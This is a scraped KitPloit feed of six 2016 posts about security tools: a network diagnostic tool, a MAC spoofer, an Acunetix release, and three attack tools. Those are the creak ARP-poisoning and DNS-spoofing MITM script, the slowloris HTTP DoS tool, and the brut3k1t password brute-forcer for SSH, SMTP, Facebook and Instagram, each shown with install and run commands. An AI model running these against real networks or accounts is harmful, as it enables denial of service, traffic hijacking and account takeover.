Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

myLG - Network Diagnostic Tool

November 15, 2016, 5:54 am
$
0
0

myLG is an open source software utility which combines the functions of the different network probes in one network diagnostic tool.

Features
  • Popular looking glasses (ping/trace/bgp): Telia, Level3
  • More than 200 countries DNS Lookup information
  • Local ping and real-time trace route
  • Packet analyzer - TCP/IP and other packets
  • Quick NMS (network management system)
  • Local HTTP/HTTPS ping (GET, POST, HEAD)
  • RIPE information (ASN, IP/CIDR)
  • PeeringDB information
  • Port scanning
  • Network LAN Discovery
  • Web dashboard
  • Configurable options
  • Direct access to commands from shell
  • Support vi and emacs mode, almost all basic features
  • CLI auto complete and history features

Demo

Screenshoots

Usage 
=================================================   
                          _    ___ 
                _ __ _  _| |  / __|
               | '  \ || | |_| (_ |
               |_|_|_\_, |____\___|
                      |__/          

                 My Looking Glass
           Free Network Diagnostic Tool
             www.facebook.com/mylg.io
                  http://mylg.io
================== myLG v0.2.5 ==================

local> hping https://www.google.com -trace -c 4
HPING www.google.com (216.58.194.196), Method: HEAD, DNSLookup: 17.2923 ms
HTTP Response seq=0, proto=HTTP/1.1, status=200, time=183.097 ms, connection=34.789 ms, first byte read=148.167 ms
HTTP Response seq=1, proto=HTTP/1.1, status=200, time=164.960 ms, connection=27.764 ms, first byte read=137.096 ms
HTTP Response seq=2, proto=HTTP/1.1, status=200, time=153.559 ms, connection=27.881 ms, first byte read=125.526 ms
HTTP Response seq=3, proto=HTTP/1.1, status=200, time=164.309 ms, connection=28.904 ms, first byte read=135.296 ms

--- www.google.com HTTP ping statistics --- 
4 requests transmitted, 4 replies received, 0% requests failed
HTTP Round-trip min/avg/max = 153.56/164.05/183.10 ms
HTTP Code [200] responses : [████████████████████] 100.00% 

local> whois 577
BACOM - Bell Canada, CA
+--------------------+-----------+
|      LOCATION      | COVERED % |
+--------------------+-----------+
| Canada - ON        |   61.3703 |
| Canada             |   36.2616 |
| Canada - QC        |    1.3461 |
| United States - MA |    0.7160 |
| Canada - BC        |    0.1766 |
| Canada - AB        |    0.0811 |
| United States      |    0.0195 |
| United States - NJ |    0.0143 |
| Belgium            |    0.0048 |
| United States - NC |    0.0048 |
| United States - TX |    0.0048 |
| Canada - NB        |    0.0000 |
| Canada - NS        |    0.0000 |
+--------------------+-----------+

local> scan www.google.com -p 1-500
+----------+------+--------+-------------+
| PROTOCOL | PORT | STATUS | DESCRIPTION |
+----------+------+--------+-------------+
| TCP      |   80 | Open   |             |
| TCP      |  443 | Open   |             |
+----------+------+--------+-------------+
Scan done: 2 opened port(s) found in 5.605 seconds

lg/telia/los angeles> bgp 8.8.8.0/24
Telia Carrier Looking Glass - show route protocol bgp 8.8.8.0/24 table inet.0

Router: Los Angeles

Command: show route protocol bgp 8.8.8.0/24 table inet.0

inet.0: 661498 destinations, 5564401 routes (657234 active, 509 holddown, 194799 hidden)
+ = Active Route, - = Last Active, * = Both

8.8.8.0/24         *[BGP/170] 33w0d 01:36:06, MED 0, localpref 200
                      AS path: 15169 I, validation-state: unverified
> to 62.115.36.170 via ae4.0
                    [BGP/170] 8w3d 11:19:40, MED 0, localpref 200, from 80.91.255.95
                      AS path: 15169 I, validation-state: unverified
                      to 62.115.119.84 via xe-1/1/0.0
                      to 62.115.119.88 via xe-1/2/0.0
                      to 62.115.119.90 via xe-11/0/3.0
                      to 62.115.119.102 via xe-9/0/0.0
                      to 62.115.119.92 via xe-9/0/2.0
> to 62.115.119.86 via xe-9/1/2.0
                      to 62.115.119.98 via xe-9/2/2.0
                      to 62.115.119.100 via xe-9/2/3.0
                      to 62.115.119.94 via xe-9/3/1.0
                      to 62.115.119.96 via xe-9/3/3.0

ns/united states/redwood city> dig yahoo.com
Trying to query server: 204.152.184.76 united states redwood city
;; opcode: QUERY, status: NOERROR, id: 19850
;; flags: qr rd ra;
yahoo.com.  728 IN  MX  1 mta6.am0.yahoodns.net.
yahoo.com.  728 IN  MX  1 mta5.am0.yahoodns.net.
yahoo.com.  728 IN  MX  1 mta7.am0.yahoodns.net.
yahoo.com.  143013  IN  NS  ns4.yahoo.com.
yahoo.com.  143013  IN  NS  ns6.yahoo.com.
yahoo.com.  143013  IN  NS  ns2.yahoo.com.
yahoo.com.  143013  IN  NS  ns5.yahoo.com.
yahoo.com.  143013  IN  NS  ns1.yahoo.com.
yahoo.com.  143013  IN  NS  ns3.yahoo.com.

;; ADDITIONAL SECTION:
ns1.yahoo.com.  561456  IN  A   68.180.131.16
ns2.yahoo.com.  27934   IN  A   68.142.255.16
ns3.yahoo.com.  532599  IN  A   203.84.221.53
ns4.yahoo.com.  532599  IN  A   98.138.11.157
ns5.yahoo.com.  532599  IN  A   119.160.247.124
ns6.yahoo.com.  143291  IN  A   121.101.144.139
ns1.yahoo.com.  51624   IN  AAAA    2001:4998:130::1001
ns2.yahoo.com.  51624   IN  AAAA    2001:4998:140::1002
ns3.yahoo.com.  51624   IN  AAAA    2406:8600:b8:fe03::1003
ns6.yahoo.com.  143291  IN  AAAA    2406:2000:108:4::1006
;; Query time: 1204 ms

;; CHAOS CLASS BIND
version.bind.   0   CH  TXT "9.10.4-P1"
hostname.bind.  0   CH  TXT "fred.isc.org"

local> peering 6327
The data provided from www.peeringdb.com
+-------------------+---------------+---------------+--------------------+------+
|       NAME        |    TRAFFIC    |     TYPE      |      WEB SITE      | NOTE |
+-------------------+---------------+---------------+--------------------+------+
| Shaw Cablesystems | 500-1000 Gbps | Cable/DSL/ISP | http://www.shaw.ca |      |
+-------------------+---------------+---------------+--------------------+------+
+------------------+--------+--------+-----------------+-------------------------+
|       NAME       | STATUS | SPEED  |    IPV4 ADDR    |        IPV6 ADDR        |
+------------------+--------+--------+-----------------+-------------------------+
| Equinix Ashburn  | ok     |  20000 | 206.126.236.20  | 2001:504:0:2::6327:1    |
| Equinix Ashburn  | ok     |  20000 | 206.223.115.20  |                         |
| Equinix Chicago  | ok     |  30000 | 206.223.119.20  | 2001:504:0:4::6327:1    |
| Equinix San Jose | ok     |  30000 | 206.223.116.20  | 2001:504:0:1::6327:1    |
| Equinix Seattle  | ok     |  20000 | 198.32.134.4    | 2001:504:12::4          |
| Equinix New York | ok     |  10000 | 198.32.118.16   | 2001:504:f::10          |
| SIX Seattle      | ok     | 100000 | 206.81.80.54    | 2001:504:16::18b7       |
| NYIIX            | ok     |  20000 | 198.32.160.86   | 2001:504:1::a500:6327:1 |
| TorIX            | ok     |  10000 | 206.108.34.12   |                         |
| PIX Vancouver    | ok     |  10000 | 206.223.127.2   |                         |
| PIX Toronto      | ok     |   1000 | 206.223.127.132 |                         |
| Equinix Toronto  | ok     |  10000 | 198.32.181.50   | 2001:504:d:80::6327:1   |
+------------------+--------+--------+-----------------+-------------------------+

local> disc
Network LAN Discovery
+--------------+-------------------+------+-----------+-------------------+
|      IP      |        MAC        | HOST | INTERFACE | ORGANIZATION NAME |
+--------------+-------------------+------+-----------+-------------------+
| 172.16.0.0   | ff:ff:ff:ff:ff:ff | NA   | en0       | NA                |
| 172.16.1.1   | e4:8d:8c:7a:66:26 | NA   | en0       | Routerboard.com   |
| 172.16.1.10  | ac:bc:32:b4:33:23 | NA   | en0       | Apple, Inc.       |
| 172.16.1.205 | 74:e5:b:97:11:28  | NA   | en0       | NA                |
| 172.16.1.254 | 54:4a:0:33:b4:2f  | NA   | en0       | NA                |
| 172.16.2.12  | d4:f4:6f:7b:8f:cf | NA   | en0       | Apple, Inc.       |
| 172.16.2.13  | 5c:ad:cf:23:7:f9  | NA   | en0       | Apple, Inc.       |
| 172.16.2.111 | d0:a6:37:72:cf:2d | NA   | en0       | Apple, Inc.       |
| 192.168.33.0 | ff:ff:ff:ff:ff:ff | NA   | vboxnet0  | NA                |
| 192.168.33.1 | a:0:27:0:0:0      | NA   | vboxnet0  | NA                |
| 224.0.0.251  | 1:0:5e:0:0:fb     | NA   | en0       | NA                |
+--------------+-------------------+------+-----------+-------------------+
11 host(s) has been found

local> whois 8.8.8.8
+------------+-------+--------------------------+
|   PREFIX   |  ASN  |          HOLDER          |
+------------+-------+--------------------------+
| 8.8.8.0/24 | 15169 | GOOGLE - Google Inc., US |
+------------+-------+--------------------------+

local> dump -d
+----------+-------------------+--------+-------+--------------------------------+-----------+-----------+--------------+----------+
|   NAME   |        MAC        | STATUS |  MTU  |          IP ADDRESSES          | MULTICAST | BROADCAST | POINTTOPOINT | LOOPBACK |
+----------+-------------------+--------+-------+--------------------------------+-----------+-----------+--------------+----------+
| lo0      |                   | UP     | 16384 | 127.0.0.1/8 ::1/128 fe80::1/64 | ✓         |           |              | ✓        |
| gif0     |                   | DOWN   |  1280 |                                | ✓         |           | ✓            |          |
| stf0     |                   | DOWN   |  1280 |                                |           |           |              |          |
| en0      | ac:bc:32:b4:33:23 | UP     |  1500 | fe80::181b:3d55:e9a2:e3df/64   | ✓         | ✓         |              |          |
|          |                   |        |       | 192.168.0.103/24               |           |           |              |          |
| p2p0     | 0e:bc:32:b4:33:23 | UP     |  2304 |                                | ✓         | ✓         |              |          |
| awdl0    | ee:3a:98:da:44:5c | UP     |  1484 | fe80::ec3a:98ff:feda:445c/64   | ✓         | ✓         |              |          |
| en1      | 4a:00:03:9c:8d:60 | UP     |  1500 |                                |           | ✓         |              |          |
| en2      | 4a:00:03:9c:8d:61 | UP     |  1500 |                                |           | ✓         |              |          |
| bridge0  | 4a:00:03:9c:8d:60 | UP     |  1500 |                                | ✓         | ✓         |              |          |
| utun0    |                   | UP     |  2000 | fe80::ec23:f621:ae74:5271/64   | ✓         |           | ✓            |          |
| utun1    |                   | UP     |  1380 | fe80::d187:7734:49d9:9d84/64   | ✓         |           | ✓            |          |
| vboxnet0 | 0a:00:27:00:00:00 | DOWN   |  1500 |                                | ✓         | ✓         |              |          |
+----------+-------------------+--------+-------+--------------------------------+-----------+-----------+--------------+----------+

local> dump 
20:29:36.415 IPv4/TCP  ec2-52-73-80-145.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61479 [P.], win 166, len: 33
20:29:36.416 IPv4/TCP  192.168.0.104:61479 > ec2-52-73-80-145.compute-1.amazonaws.com.:443(https) [.], win 4094, len: 0
20:29:36.417 IPv4/TCP  192.168.0.104:61479 > ec2-52-73-80-145.compute-1.amazonaws.com.:443(https) [P.], win 4096, len: 37
20:29:36.977 IPv4/UDP  192.168.0.104:62733 > 192.168.0.1:53(domain) , len: 0
20:29:37.537 IPv4/TCP  ec2-54-86-120-119.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61302 [.], win 124, len: 0
20:29:38.125 IPv4/TCP  192.168.0.104:61304 > ec2-52-23-213-161.compute-1.amazonaws.com.:443(https) [P.], win 4096, len: 85
20:29:38.126 IPv4/TCP  ec2-52-23-213-161.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61304 [.], win 1048, len: 0
20:29:38.760 IPv4/TCP  ec2-54-165-12-100.compute-1.amazonaws.com.:443(https) > 192.168.0.104:61296 [.], win 2085, len: 0
20:29:39.263 IPv4/ICMP 192.168.0.104 > ir1.fp.vip.ne1.yahoo.com.: EchoRequest id 20859, seq 27196, len: 56
20:29:39.265 IPv4/UDP  192.168.0.1:53(domain) > 192.168.0.104:62733 , len: 0

local> dump tcp and port 443 -c 10
23:26:56.026 IPv4/TCP  192.168.0.104:64686 > 192.0.80.242:443(https) [F.], win 8192, len: 0
23:26:56.045 IPv4/TCP  192.168.0.104:64695 > i2.wp.com.:443(https) [F.], win 8192, len: 0
23:26:56.048 IPv4/TCP  i2.wp.com.:443(https) > 192.168.0.104:64695 [F.], win 62, len: 0
23:26:56.081 IPv4/TCP  192.168.0.104:63692 > ec2-54-88-144-213.compute-1.amazonaws.com.:443(https) [P.], win 4096, len: 37
23:26:56.082 IPv4/TCP  192.168.0.104:64695 > i2.wp.com.:443(https) [.], win 8192, len: 0
23:26:56.083 IPv4/TCP  192.0.80.242:443(https) > 192.168.0.104:64686 [.], win 64, len: 0
23:26:56.150 IPv4/TCP  ec2-54-88-144-213.compute-1.amazonaws.com.:443(https) > 192.168.0.104:63692 [.], win 166, len: 0
23:26:56.259 IPv4/TCP  ec2-54-172-56-148.compute-1.amazonaws.com.:443(https) > 192.168.0.104:63623 [P.], win 1316, len: 85
23:26:56.260 IPv4/TCP  192.168.0.104:63623 > ec2-54-172-56-148.compute-1.amazonaws.com.:443(https) [.], win 4093, len: 0
23:26:56.820 IPv4/TCP  192.168.0.104:64691 > 192.30.253.116:443(https) [.], win 4096, len: 0

local> dump -s http -x
22:10:15.770 IPv4/TCP  151.101.44.143:443(https) > 10.0.9.9:50771 [P.], win 59, len: 156
00000000  16 03 03 00 64 02 00 00  60 03 03 a2 32 19 4b 78  |....d...`...2.Kx|
00000010  77 ed 40 75 f6 4c 55 74  43 1d b7 6c f2 59 f8 d8  |w.@u.LUtC..l.Y..|
00000020  09 8a 3e 03 62 56 38 45  d2 bc 02 20 bd 52 8a 42  |..>.bV8E... .R.B|
00000030  5b 01 33 7d 2b 0b 41 da  eb 38 87 79 f1 37 62 5c  |[.3}+.A..8.y.7b\|
00000040  f3 ed 5a 7c 07 6c e9 28  9b fe fa 76 c0 2f 00 00  |..Z|.l.(...v./..|
00000050  18 ff 01 00 01 00 00 05  00 00 00 10 00 0b 00 09  |................|
00000060  08 68 74 74 70 2f 31 2e  31 14 03 03 00 01 01 16  |.http/1.1.......|
00000070  03 03 00 28 fc 20 2d 6f  1a 94 78 53 55 0f 8c 05  |...(. -o..xSU...|
00000080  3e ae 12 34 79 af d2 a9  bd 22 e5 3f b1 2b f5 36  |>..4y....".?.+.6|
00000090  ba 51 31 37 f5 0b e6 d2  40 fb 88 a5              |.Q17....@...    |

local> dump !udp -w /home/user1/mypcap -c 100000

local> ping google.com -6
PING google.com (2607:f8b0:400b:80a::200e): 56 data bytes
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=0 time=23.193988 ms
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=1 time=21.265492 ms
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=2 time=24.521306 ms
64 bytes from 2607:f8b0:400b:80a::200e icmp_seq=3 time=25.313072 ms

local> trace google.com
trace route to google.com (172.217.4.142), 30 hops max
1  192.168.0.1 4.705 ms 1.236 ms 0.941 ms 
2  142.254.236.25 [ASN 20001/ROADRUNNER-WEST] 13.941 ms 13.504 ms 12.303 ms 
3  agg59.snmncaby01h.socal.rr.com. (76.167.31.241) [ASN 20001/ROADRUNNER-WEST] 14.834 ms 11.625 ms 13.050 ms 
4  agg20.lamrcadq01r.socal.rr.com. (72.129.10.128) [ASN 20001/ROADRUNNER-WEST] 17.617 ms 18.064 ms 15.612 ms 
5  agg28.lsancarc01r.socal.rr.com. (72.129.9.0) [ASN 20001/ROADRUNNER-WEST] 16.291 ms 24.079 ms 20.456 ms 
6  bu-ether26.lsancarc0yw-bcr00.tbone.rr.com. (66.109.3.230) [ASN 7843/TWCABLE-BACKBONE] 18.339 ms 23.278 ms 23.434 ms 
7  216.0.6.25 [ASN 2828/XO-AS15] 19.842 ms 21.025 ms 35.105 ms 
8  216.0.6.42 [ASN 2828/XO-AS15] 16.666 ms 18.252 ms 18.872 ms 
9  209.85.245.199 [ASN 15169/GOOGLE] 14.358 ms 17.478 ms 
   209.85.246.125 [ASN 15169/GOOGLE] 18.593 ms 
10 72.14.239.121 [ASN 15169/GOOGLE] 21.635 ms 
   72.14.238.213 [ASN 15169/GOOGLE] 16.133 ms 
   72.14.239.121 [ASN 15169/GOOGLE] 21.541 ms 
11 lax17s14-in-f14.1e100.net. (172.217.4.142) [ASN 15169/GOOGLE] 18.127 ms 17.151 ms 18.892 ms 

local> show config 
set ping     timeout    2s
set ping     interval   1s
set ping     count      4
set hping    timeout    2s
set hping    method     HEAD
set hping    data       mylg
set hping    count      5
set web      port       8080
set web      address    127.0.0.1
set scan     port       1-500

local> set hping count 10

sh-3.2# mylg peering 577
The data provided from www.peeringdb.com
+----------------------+---------+------+--------------------+------+
|         NAME         | TRAFFIC | TYPE |      WEB SITE      | NOTE |
+----------------------+---------+------+--------------------+------+
| Bell Canada Backbone |         | NSP  | http://www.bell.ca |      |
+----------------------+---------+------+--------------------+------+
+-------------------+--------+-------+-----------------+------------------------+
|       NAME        | STATUS | SPEED |    IPV4 ADDR    |       IPV6 ADDR        |
+-------------------+--------+-------+-----------------+------------------------+
| Equinix Ashburn   | ok     | 20000 | 206.126.236.203 | 2001:504:0:2::577:1    |
| Equinix Chicago   | ok     | 20000 | 206.223.119.66  | 2001:504:0:4::577:1    |
| Equinix Palo Alto | ok     | 10000 | 198.32.176.94   | 2001:504:d::5e         |
| Equinix New York  | ok     | 10000 | 198.32.118.113  | 2001:504:f::577:1      |
| SIX Seattle       | ok     | 10000 | 206.81.80.217   | 2001:504:16::241       |
| NYIIX             | ok     | 10000 | 198.32.160.36   | 2001:504:1::a500:577:1 |
+-------------------+--------+-------+-----------------+------------------------+

local> nms
nms> connect core1-sjc
Connected: Juniper Networks, Inc. qfx10008 Ethernet Switch, kernel JUNOS 15.1X53 ...
nms/core1-sjc> show interface xe-.*
15 interfaces has been found
+--------------+---------+---------------------------------+------------+-------------+------------+-------------+------------+-------------+----------+-----------+
|  INTERFACE   | STATUS  |           DESCRIPTION           | TRAFFIC IN | TRAFFIC OUT | PACKETS IN | PACKETS OUT | DISCARD IN | DISCARD OUT | ERROR IN | ERROR OUT |
+--------------+---------+---------------------------------+------------+-------------+------------+-------------+------------+-------------+----------+-----------+
| xe-7/0/0:1   | Up      | RSW011-01-SJC-002               | 192.58 K   | 75.72 K     | 64.60      | 56.60       | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-7/0/0:2   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-7/0/0:3   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-7/0/0:0   | Up      | RSW012-01-SJC-001               | 61.40 K    | 10.04 K     | 8.60       | 5.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/0:0   | Down    | CORE1-SAN-XE-2/2/0-AGGIPER40GLR | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/0:1   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/0:2   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/0:3   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/1:0   | Up      | CORE1-SAN-XE-10/3/1-10GTEK      | 11.79 M    | 1.39 M      | 1.82 K     | 1.02 K      | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/1:1   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/1:2   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/1:3   | Down    |                                 | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/2:0   | Up      | CORE2-SJC-XE-1/2/0-AGG59        | 5.25 K     | 409.60      | 0.20       | 0.01        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/2:1   | Up      | CORE3-SJC-XE-1/3/0-AGG31        | 5.44 K     | 0.00        | 0.31       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
| xe-6/0/3:0   | Down    | CORE3-SJC-XE-1/0/0-40GTEK       | 0.00       | 0.00        | 0.00       | 0.00        | 0.00       | 0.00        | 0.00     | 0.00      |
+--------------+---------+---------------------------------+------------+-------------+------------+-------------+------------+-------------+----------+-----------+
* units per seconds

Build
It can be built for Linux and Darwin. there is libpcap dependency: 
- LINUX
apt-get install libpcap-dev
- OSX
brew install homebrew/dupes/libpcap
Given that the Go Language compiler (version 1.7 or greater is required) is installed, you can build and run it with: 
git clone https://github.com/mehrdadrad/mylg.git
cd mylg
go get
go build mylg


Search

creak - Poison, Reset, Spoof, Redirect MITM Script

November 16, 2016, 6:00 am
$
0
0

Performs some of the most famous MITM attack on target addresses located in a local network. Among these, deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router. Born as a didactic project for learning python language, I decline every responsibility for any abuse, including malevolent or illegal use of this code.

Installation 
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
or simply clone the repository and run the creak.py after all requirements are installed: 
$ git clone https://github.com/codepr/creak.git
It is required to have installed pcap libraries for raw packet manipulations and dpkt module, for dns spoofing options is required to have installed dnet module from libdnet package, do not confuse it with pydnet (network evaluation tool) module. It can use also scapy if desired, can just be set in the config.py file.

Options 
Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150), can be specified multiple times
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example
Most basic usage: Deny all traffic to the target host 
$ python creak.py -t 192.168.1.30 wlan0
Set a different gateway: 
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Set a different mac address for the device: 
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
Spoof mac address generating a fake one: 
$ python creak.py -x -t 192.168.1.30 wlan0
Spoof mac address generating one based on manufacturer(e.g Xeros): 
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz(e.g. localhost): 
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Deny multiple hosts in the subnet: 
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0


WinMACSpoofer - Windows Tool For Spoofing The Mac Address

November 17, 2016, 6:31 am
$
0
0

Windows application for spoofing the MAC address and host name.

Usage
The program must be run in "administrator mode" for the functions to work properly
  1. Set a new Random MAC address
    • Press the randomize button to generate a random MAC address
    • Click the random radio button and hit "Set New Mac" to reset your MAC address to this new address
  2. Set the MAC address manually
    • To use a specially selected MAC address enter the desired values in the text fields
    • CAUTION The second nibble can only be set with a value of ('A', 'E', '2' or '6')
    • e.g. xy-xx-xx-xx-xx-xx, y represents the second nibble and must be represented by ('A', 'E', '2' or '6')
    • x can be represented by any hexadecimal value
  3. Reset the MAC address
    • To revert the MAC adrress back to the network adapter's original values press the "reset" button
  4. Change Host Name
    • Enter the desired host name and press "Change Host Name"


Acunetix v11 - Web Application Security Testing Tool

November 18, 2016, 6:24 am
$
0
0
London, UK – November 2016 – Acunetix, the pioneer in automated web application security software, has announced the release of version 11. New integrated vulnerability management features extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats – ordered by business criticality. Version 11 includes a new web-based UI for greater ease-of-use and manageability, providing access by multiple users.
For the first time in the marketplace Acunetix is launching an enterprise-level product that integrates sophisticated automated testing technology with vulnerability management, at a price point accessible to every development team. Chris Martin, CEO, Acunetix explains:
“Acunetix has for the past 12 years been at the forefront in web application security with its cutting-edge vulnerability scanning technology. With version 11 we have combined proactive scanning for web application vulnerabilities with the prioritization of mitigation activities. This integration helps security teams gain the intelligence they need to work more efficiently, prioritizing actions, assigning jobs and therefore reducing costs.”
The new web-based interface significantly improves the manageability of the Acunetix on-premises solution, making it easy for less seasoned security personnel to check the vulnerabilities within the company’s web assets. In addition, user privileges can be automatically assigned.
Nicholas Sciberras, CTO, Acunetix, comments: “Version 11 helps organizations engaged heavily in application development by utilising a role-based multi-user system.”

Inbuilt Vulnerability Management

New integrated vulnerability management features allow for the review of aggregated vulnerability data across all Targets, prioritizing security risks and therefore providing a clear view of the business’ security posture, while facilitating compliance.
New inbuilt vulnerability management features include:
  • All Targets (web applications to scan) are now stored in Acunetix with their individual settings and can be easily re-scanned.
  • Targets are displayed in one interface and classified by business criticality, allowing you to easily focus on the most important assets.
  • Vulnerabilities can also be prioritized by the Target’s business criticality.
  • Consolidated reports are stored in the central interface.
  • Users can choose between “Target reports”, “Scan reports” or “All Vulnerabilities” report.

Web-based user interface

The user interface has been re-engineered from the ground up for greater usability and manageability. The minimalist design focuses on the most widely used and important features, doing away with extras which cluttered the screen. Since the interface is now web-based, multiple users can access it from their browser irrespective of the OS used.


Role-based multi-user system

Acunetix version 11 allows the creation of multiple user accounts, which can be assigned a particular group of targets. Depending on the privileges assigned to the user, the user can create, scan, and report on the targets assigned to him.This is particularly important for large enterprises, which require multiple users to help secure their assets.


Standard, Pro and Enterprise Editions

Acunetix version 11 will be available in three main editions: Standard, Pro and Enterprise.
Standard Edition– is the entry level, ideal for small organisations and single workstation users. The Standard Edition offers the same level of vulnerability detection provided in the Pro and Enterprise Editions and includes Developer, Executive Summary and OWASP Top 10 reports.
Pro Edition– The Pro Edition allows outsourced or insourced security professionals to group and classify asset targets. It integrates with Software Development Life Cycle (SDLC) project management or bug tracking systems, includes comprehensive compliance reports, and integrates with top Web Application Firewalls (WAFs).
Enterprise Edition– includes full multi-user team support and has the ability to deploy multiple scan engines managed by the central system. The Enterprise Edition will be able to scale from 3 to unlimited users and up to 50 Acunetix scan engines.


Download Acunetix v11

slowloris - Low bandwidth DoS tool

November 19, 2016, 5:48 am
$
0
0

Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:
  1. We start making lots of HTTP requests.
  2. We send headers periodically (every ~15 seconds) to keep the connections open.
  3. We never close the connection unless the server does so. If the server closes a connection, we create a new one keep doing the same thing.
This exhausts the servers thread pool and the server can't reply to other people.

How to install and run?
You can clone the git repo or install using pip . Here's how you run it.
  • sudo pip3 install slowloris
  • slowloris example.com
That's all it takes to install and run slowloris.py.
If you want to clone using git instead of pip, here's how you do it.
  • git clone https://github.com/gkbrk/slowloris.git
  • cd slowloris
  • python3 slowloris.py example.com

Configuration options
It is possible to modify the behaviour of slowloris with command-line arguments.


brut3k1t - Server-side Brute-force Module (ssh, ftp, smtp, facebook, and more)

November 20, 2016, 5:58 am
$
0
0

Server-side brute-force module. Brute-force (dictionary attack, jk) attack that supports multiple protocols and services.

1. Introduction
brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The current protocols that are complete and in support are: 
ssh
ftp
smtp
XMPP
instagram
facebook
There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram).

2. Installation
Installation is simple. brut3k1t requires several dependencies, although they will be installed by the program if you do not have it.
  • argparse - utilized for parsing command line arguments
  • paramiko - utilized for working with SSH connections and authentication
  • ftplib - utilized for working with FTP connections and authentication
  • smtplib - utilized for working with SMTP (email) connections and authentication
  • fbchat - utilized for connecting with Facebook
  • selenium - utilized for web scraping, which is used with Instagram (and later Twitter)
  • xmppy - utiized for XMPP connections ...and more within the future!
Downloading is simple. Simply git clone . 
git clone https://github.com/ex0dus-0x/brut3k1t
Change to directory: 
cd /path/to/brut3k1t

3. Usage
Utilizing brut3k1t is a little more complicated than just running a Python file.
Typing python brut3k1t -h shows the help menu: 
usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
               [-p PORT] [-d DELAY]

Server-side bruteforce module written in Python

optional arguments:
-h, --help            show this help message and exit
-a ADDRESS, --address ADDRESS
                    Provide host address for specified service. Required
                    for certain protocols
-p PORT, --port PORT  Provide port for host address for specified service.
                    If not specified, will be automatically set
-d DELAY, --delay DELAY
                    Provide the number of seconds the program delays as
                    each password is tried

required arguments:
-s SERVICE, --service SERVICE
                    Provide a service being attacked. Several protocols
                    and services are supported
-u USERNAME, --username USERNAME
                    Provide a valid username for service/protocol being
                    executed
-w PASSWORD, --wordlist PASSWORD
                    Provide a wordlist or directory to a wordlist

Examples of usage:
Cracking SSH server running on 192.168.1.3 using root and wordlist.txt as a wordlist. 
python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt
The program will automatically set the port to 22, but if it is different, specify with -p flag.
Cracking email test@gmail.com with wordlist.txt on port 25 with a 3 second delay. For email it is necessary to use the SMTP server's address. For e.g Gmail = smtp.gmail.com . You can research this using Google. 
python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3
Cracking XMPP test@creep.im with wordlist.txt on default port 5222 . XMPP also is similar to SMTP, whereas you will need to provide the address of the XMPP server, in this case creep.im . 
python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt
Cracking Facebook is quite a challenge, since you will require the target user ID, not the username. 
python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt
Cracking Instagram with username test with wordlist wordlist.txt and a 5 second delay 
 python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5
## KEY NOTES TO REMEMBER
  • If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um... web-based. :)
  • If you do not supply the delay -d flag, the default delay in seconds will be 1.
